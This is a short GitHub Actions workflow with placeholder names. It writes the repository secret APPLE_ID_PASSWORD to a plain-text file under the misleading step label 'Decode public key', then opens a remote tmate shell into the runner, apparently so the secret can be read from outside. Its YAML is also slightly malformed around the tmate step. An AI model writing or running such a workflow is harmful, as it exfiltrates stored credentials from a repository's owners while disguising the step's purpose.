name: xyz
on:
  workflow_dispatch:

jobs:
  abcdefghijklmnopqrstuvqxyz:
    runs-on: ubuntu-latest
    env:
      APPLE_APP_SPECIFIC_PASSWORD: ${{ secrets.APPLE_ID_PASSWORD }}

    steps:
      - name: Install OpenSSL
        run: sudo apt-get install -y openssl

      - name: Decode public key
        run: echo $APPLE_APP_SPECIFIC_PASSWORD >> secret.txt

      - name: Run tmate
      - uses: mxschmitt/action-tmate@v2





